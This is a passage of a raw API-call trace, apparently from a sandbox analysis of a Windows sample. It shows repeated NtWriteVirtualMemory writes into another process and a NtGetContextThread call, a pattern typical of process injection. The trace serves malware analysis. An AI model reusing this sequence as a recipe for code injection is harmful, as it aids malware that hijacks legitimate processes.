Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.794] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x3814428*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814428*, NumberOfBytesWritten=0x0) returned 0x0 [0195.794] GetLastError () returned 0x578 [0195.794] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.794] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0195.794] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.794] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.794] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.794] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.795] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.795] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.795] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.795] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.795] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.795] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.795] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.795] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.795] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.795] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc0000005 [0195.795] NtWriteVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x401000, Buffer=0x3815270, NumberOfBytesToWrite=0x3d000, NumberOfBytesWritten=0x0 | out: NumberOfBytesWritten=0x0) returned 0xc0000005 [0195.795] GetLastError () returned 0x578 [0195.795] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.795] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0195.795] VarAdd (in: pvarLeft=0x18f750, pvarRight=0x18f740, pvarResult=0x18f730 | out: pvarResult=0x18f730) returned 0x0 [0195.796] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.796] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.796] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.796] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.796] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.796] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.796] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.796] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.796] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.796] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.796] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.796] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.796] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.796] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.796] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x381444c*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x381444c*, NumberOfBytesWritten=0x0) returned 0x0 [0195.796] GetLastError () returned 0x578 [0195.796] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.796] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.797] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.797] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.797] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.797] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.797] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.797] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.797] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.797] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.797] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.797] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.797] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.797] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.797] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.797] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x3814454*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814454*, NumberOfBytesWritten=0x0) returned 0x0 [0195.797] GetLastError () returned 0x578 [0195.797] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.797] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.798] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.798] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.798] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.798] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.798] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.798] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.798] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.798] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.798] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.798] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.798] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.798] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.798] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.798] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x3814450*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814450*, NumberOfBytesWritten=0x0) returned 0x0 [0195.798] GetLastError () returned 0x578 [0195.798] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.798] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0195.798] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.798] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.799] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.799] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.799] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.799] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.799] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.799] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.799] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.799] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.799] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.799] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.799] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.799] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.799] NtWriteVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x43e000, Buffer=0x3814270*, NumberOfBytesToWrite=0x0, NumberOfBytesWritten=0x0 | out: Buffer=0x3814270*, NumberOfBytesWritten=0x0) returned 0x0 [0195.799] GetLastError () returned 0x578 [0195.799] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.799] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0195.799] VarAdd (in: pvarLeft=0x18f750, pvarRight=0x18f740, pvarResult=0x18f730 | out: pvarResult=0x18f730) returned 0x0 [0195.799] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.800] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.800] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.800] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.800] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.800] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.800] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.800] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.800] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.800] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.800] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.800] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.800] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.800] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.800] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x3814474*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814474*, NumberOfBytesWritten=0x0) returned 0x0 [0195.800] GetLastError () returned 0x578 [0195.800] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.800] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.801] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.801] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.801] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.801] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.801] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.801] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.801] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.801] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.801] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.801] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.801] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.801] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.801] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.801] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x381447c*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x381447c*, NumberOfBytesWritten=0x0) returned 0x0 [0195.801] GetLastError () returned 0x578 [0195.801] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.801] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.801] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.802] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.802] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.802] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.802] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.802] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.802] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.802] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.802] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.802] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.802] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.802] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.802] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.802] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x3814478*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814478*, NumberOfBytesWritten=0x0) returned 0x0 [0195.802] GetLastError () returned 0x578 [0195.802] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.802] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0195.802] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.803] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.803] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.803] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.803] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.803] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.803] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.803] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.803] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.803] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.803] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.803] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.803] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.803] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.803] NtWriteVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x442000, Buffer=0x3852270*, NumberOfBytesToWrite=0x1000, NumberOfBytesWritten=0x0 | out: Buffer=0x3852270*, NumberOfBytesWritten=0x0) returned 0x0 [0195.803] GetLastError () returned 0x578 [0195.803] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.804] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8a0 | out: ppsaOut=0x18f8a0) returned 0x0 [0195.804] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.804] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.804] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.804] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.804] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.804] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.804] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.804] NtGetContextThread (in: ThreadHandle=0xfc, Context=0x5def18 | out: Context=0x5def18*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x291c9a, Ebp=0x0, Eip=0x77e301c4, SegCs=0x23, EFlags=0x202, Esp=0x44fb10, SegSs=0x2b, ExtendedRegisters=([0]=0xd7, [1]=0xcf, [2]=0x0, [3]=0x0, [4]=0xdf, [5]=0x3f, [6]=0x10, [7]=0x7, [8]=0xd6, [9]=0xcf, [10]=0x0, [11]=0x9, [12]=0x55, [13]=0x8b, [14]=0xec, [15]=0x83, [16]=0xc4, [17]=0xf4, [18]=0x60, [19]=0x8b, [20]=0x4d, [21]=0x10, [22]=0x89, [23]=0x4d, [24]=0xfc, [25]=0x3, [26]=0x4d, [27]=0x14, [28]=0x89, [29]=0x4d, [30]=0xf4, [31]=0x8b, [32]=0x4d, [33]=0x10, [34]=0x8a, [35]=0x1, [36]=0x88, [37]=0x45, [38]=0xfb, [39]=0x8b, [40]=0x4d, [41]=0xc, [42]=0x8b, [43]=0x75, [44]=0x8, [45]=0x8b, [46]=0xfe, [47]=0x8a, [48]=0x6, [49]=0x46, [50]=0x32, [51]=0x45, [52]=0xfb, [53]=0x56, [54]=0x50, [55]=0xff, [56]=0x45, [57]=0xfc, [58]=0x8b, [59]=0x75, [60]=0xfc, [61]=0x8a, [62]=0x6, [63]=0x46, [64]=0x8b, [65]=0x5d, [66]=0xf4, [67]=0x39, [68]=0x5d, [69]=0xfc, [70]=0x75, [71]=0xb, [72]=0x8b, [73]=0x5d, [74]=0x10, [75]=0x89, [76]=0x5d, [77]=0xfc, [78]=0x8b, [79]=0xf3, [80]=0x8a, [81]=0x6, [82]=0x46, [83]=0x88, [84]=0x45, [85]=0xfb, [86]=0x58, [87]=0x5e, [88]=0x88, [89]=0x7, [90]=0x47, [91]=0x49, [92]=0x75, [93]=0xd1, [94]=0x61, [95]=0xc9, [96]=0xc2, [97]=0x10, [98]=0x0, [99]=0x0, [100]=0xdf, [101]=0x3f, [102]=0x10, [103]=0x7, [104]=0xc1, [105]=0xcf, [106]=0x0, [107]=0xc, [108]=0x4c, [109]=0x77, [110]=0x40, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x6c, [117]=0xf0, [118]=0x5d, [119]=0x0, [120]=0xcc, [121]=0xa8, [122]=0x37, [123]=0x2, [124]=0x54, [125]=0xa8, [126]=0x37, [127]=0x2, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x80, [137]=0xe6, [138]=0x96, [139]=0x72, [140]=0x6, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x6, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xf, [153]=0x10, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x10, [161]=0x2b, [162]=0x40, [163]=0x0, [164]=0xa4, [165]=0x2b, [166]=0x40, [167]=0x0, [168]=0xf0, [169]=0x2b, [170]=0x40, [171]=0x0, [172]=0x4c, [173]=0x2c, [174]=0x40, [175]=0x0, [176]=0xb8, [177]=0x2c, [178]=0x40, [179]=0x0, [180]=0x14, [181]=0x2d, [182]=0x40, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0xc4, [197]=0x3f, [198]=0x10, [199]=0x1c, [200]=0xc1, [201]=0xcf, [202]=0x0, [203]=0x8, [204]=0x20, [205]=0x2f, [206]=0x74, [207]=0x76, [208]=0x4, [209]=0x2f, [210]=0x74, [211]=0x76, [212]=0xd4, [213]=0x2e, [214]=0x74, [215]=0x76, [216]=0xb4, [217]=0x2e, [218]=0x74, [219]=0x76, [220]=0x98, [221]=0x2e, [222]=0x74, [223]=0x76, [224]=0x84, [225]=0x2e, [226]=0x74, [227]=0x76, [228]=0xc8, [229]=0xb, [230]=0x73, [231]=0x76, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0xc4, [237]=0xf0, [238]=0x5d, [239]=0x0, [240]=0x1, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0xe8, [253]=0xb, [254]=0x73, [255]=0x76, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0xc4, [261]=0xf0, [262]=0x5d, [263]=0x0, [264]=0x1, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x44, [273]=0x42, [274]=0x1, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x60, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0xec, [285]=0x9, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x90, [291]=0x1, [292]=0x0, [293]=0x0, [294]=0x4d, [295]=0x0, [296]=0x53, [297]=0x0, [298]=0x20, [299]=0x0, [300]=0x53, [301]=0x0, [302]=0x61, [303]=0x0, [304]=0x6e, [305]=0x0, [306]=0x73, [307]=0x0, [308]=0x20, [309]=0x0, [310]=0x53, [311]=0x0, [312]=0x65, [313]=0x0, [314]=0x72, [315]=0x0, [316]=0x69, [317]=0x0, [318]=0x66, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xc3, [365]=0x7, [366]=0xa, [367]=0x65, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x1, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x26, [381]=0x3f, [382]=0x10, [383]=0xfe, [384]=0xda, [385]=0xcf, [386]=0x0, [387]=0x8, [388]=0x80, [389]=0x38, [390]=0x1, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x60, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0xec, [401]=0x9, [402]=0x0, [403]=0x0, [404]=0x1, [405]=0x0, [406]=0x90, [407]=0x1, [408]=0x0, [409]=0x0, 